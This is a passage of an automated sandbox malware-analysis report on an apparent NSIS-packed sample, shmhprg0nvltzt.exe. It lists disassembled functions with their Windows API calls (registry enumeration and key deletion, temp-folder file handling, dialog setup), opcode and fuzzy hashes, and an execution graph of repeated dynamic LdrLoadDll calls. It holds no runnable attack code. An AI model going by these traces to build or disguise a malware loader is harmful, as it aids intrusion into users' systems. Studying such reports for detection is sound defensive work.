                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 3449924974-3355392842
                                                                                                                                                                                                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1354259210-0
                                                                                                                                                                                                                                • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                                                                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2584051700-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nslEFEC.tmp
                                                                                                                                                                                                                                • API String ID: 3248276644-4252944483
                                                                                                                                                                                                                                • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                                                                                • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                • CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                • CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nslEFEC.tmp, xrefs: 00405EB8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp
                                                                                                                                                                                                                                • API String ID: 3213498283-3338105827
                                                                                                                                                                                                                                • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                                                                                                                                                                                                • Instruction ID: b7f7aa27055ddc775a1b47344aef2f77b81fec2ea34db2f3ccdabfa21b6bce3d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BF0F631810E1296DB317B548C44E7B97BCEB64354B04843BD741B71C0D3BC8D808BDA
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                                                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll), ref: 00402695
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp$C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll
                                                                                                                                                                                                                                • API String ID: 1659193697-1814371670
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405542
                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                                                                                                                                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll), ref: 0040645C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                                • String ID: Call
                                                                                                                                                                                                                                • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,76F73420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                                                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(80000000,C:\Program Files (x86)\E6l40hhe,004030E9,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                                                                                                                                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Program Files (x86)\E6l40hhe,004030E9,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,80000000,00000003), ref: 00405E6E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Program Files (x86)\E6l40hhe, xrefs: 00405E58
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                • String ID: C:\Program Files (x86)\E6l40hhe
                                                                                                                                                                                                                                • API String ID: 2709904686-3393615557
                                                                                                                                                                                                                                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:7.6%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:1.5%
                                                                                                                                                                                                                                Total number of Nodes:735
                                                                                                                                                                                                                                Total number of Limit Nodes:24
4851->4852 4853 244a227b412 LdrLoadDll 4852->4853 4854 244a2274613 4853->4854 4855 244a227b412 LdrLoadDll 4854->4855 4854->4874 4856 244a227464e 4855->4856 4978 244a227c992 4856->4978 4858 244a2274662 4858->4874 4984 244a2279672 4858->4984 4860 244a2274713 4861 244a227b412 LdrLoadDll 4860->4861 4862 244a227476e 4861->4862 4863 244a227b412 LdrLoadDll 4862->4863 4864 244a2274792 4863->4864 4865 244a227b412 LdrLoadDll 4864->4865 4866 244a22747b6 4865->4866 4867 244a227b412 LdrLoadDll 4866->4867 4868 244a22747da 4867->4868 4869 244a227b412 LdrLoadDll 4868->4869 4870 244a22747fe 4869->4870 4871 244a227b412 LdrLoadDll 4870->4871 4872 244a227482f 4871->4872 4873 244a227c992 LdrLoadDll 4872->4873 4873->4874 4874->4810 4874->4816 4874->4818 4874->4819 4876 244a227c992 LdrLoadDll 4875->4876 4877 244a22768c7 4876->4877 4878 244a227c992 LdrLoadDll 4877->4878 4879 244a22768db 4878->4879 4880 244a2276a6f 4879->4880 4881 244a22794e2 LdrLoadDll 4879->4881 4894 244a227b412 4880->4894 4882 244a227691f 4881->4882 4988 244a2276302 4882->4988 4884 244a2276940 4884->4880 4885 244a22794e2 LdrLoadDll 4884->4885 4886 244a22769cf 4885->4886 4886->4880 4887 244a227b412 LdrLoadDll 4886->4887 4888 244a22769f1 4887->4888 4888->4880 5015 244a22764b2 4888->5015 4893 244a227ac42 LdrLoadDll 4893->4880 4895 244a227b62b 4894->4895 4896 244a227b437 4894->4896 4895->4828 4897 244a227b44e 4896->4897 5085 244a227b982 4896->5085 4897->4828 4900 244a2279f3b 4899->4900 4901 244a22780a2 LdrLoadDll 4900->4901 4902 244a2279f44 4901->4902 4903 244a227b412 LdrLoadDll 4902->4903 4931 244a227a422 4902->4931 4904 244a2279fe5 4903->4904 4905 244a227b412 LdrLoadDll 4904->4905 4906 244a227a00d 4905->4906 4907 244a227b412 LdrLoadDll 4906->4907 4906->4931 4908 244a227a052 4907->4908 4909 244a227b412 LdrLoadDll 4908->4909 4911 244a227a0af 4909->4911 4910 244a227a0bf 4910->4809 4911->4910 4912 244a227b412 LdrLoadDll 4911->4912 4913 244a227a132 4912->4913 4913->4910 4914 244a227a1ab 4913->4914 4915 244a227a160 4913->4915 
4916 244a227b412 LdrLoadDll 4914->4916 5103 244a2279cb2 4915->5103 4917 244a227a1cc 4916->4917 4920 244a227a1dd 4917->4920 4921 244a227b412 LdrLoadDll 4917->4921 4920->4809 4922 244a227a22a 4921->4922 4923 244a227b412 LdrLoadDll 4922->4923 4924 244a227a25a 4923->4924 4925 244a227a335 4924->4925 4928 244a227a2e2 4924->4928 5115 244a2274b22 4924->5115 5123 244a2279a82 4925->5123 4929 244a227b412 LdrLoadDll 4928->4929 4932 244a227a376 4928->4932 4929->4932 4930 244a227b412 LdrLoadDll 4930->4931 4931->4809 4932->4930 4934 244a227a8cf 4933->4934 4935 244a227ac2c 4934->4935 4936 244a227b412 LdrLoadDll 4934->4936 4935->4819 4937 244a227a92d 4936->4937 4938 244a227b412 LdrLoadDll 4937->4938 4939 244a227a95e 4938->4939 4940 244a227b412 LdrLoadDll 4939->4940 4942 244a227a98f 4940->4942 4941 244a227abeb 4941->4819 4942->4941 5135 244a22797c2 4942->5135 4944 244a227aaf5 5139 244a227a742 4944->5139 4946 244a227ab11 4946->4941 4947 244a227b412 LdrLoadDll 4946->4947 4948 244a227ab60 4947->4948 4949 244a227b412 LdrLoadDll 4948->4949 4950 244a227ab8d 4949->4950 4951 244a227b412 LdrLoadDll 4950->4951 4952 244a227abbc 4951->4952 4953 244a227b412 LdrLoadDll 4952->4953 4953->4941 4955 244a22734b3 4954->4955 4956 244a22794e2 LdrLoadDll 4955->4956 4957 244a227353a 4956->4957 4958 244a22794e2 LdrLoadDll 4957->4958 4969 244a227361b 4957->4969 4959 244a227355e 4958->4959 4960 244a227b412 LdrLoadDll 4959->4960 4959->4969 4961 244a2273587 4960->4961 4962 244a227b412 LdrLoadDll 4961->4962 4963 244a22735ab 4962->4963 4964 244a227b412 LdrLoadDll 4963->4964 4965 244a22735cf 4964->4965 4966 244a227b412 LdrLoadDll 4965->4966 4967 244a22735f7 4966->4967 4968 244a227b412 LdrLoadDll 4967->4968 4968->4969 4969->4821 4972 244a227950a 4970->4972 4971 244a227950e 4971->4832 4972->4971 4973 244a227954a LdrLoadDll 4972->4973 4974 244a2279566 4972->4974 4973->4974 4974->4832 4976 244a227b412 LdrLoadDll 4975->4976 4977 244a22733a0 4976->4977 4977->4819 4979 244a227c9b3 4978->4979 4983 244a227c9a6 4978->4983 
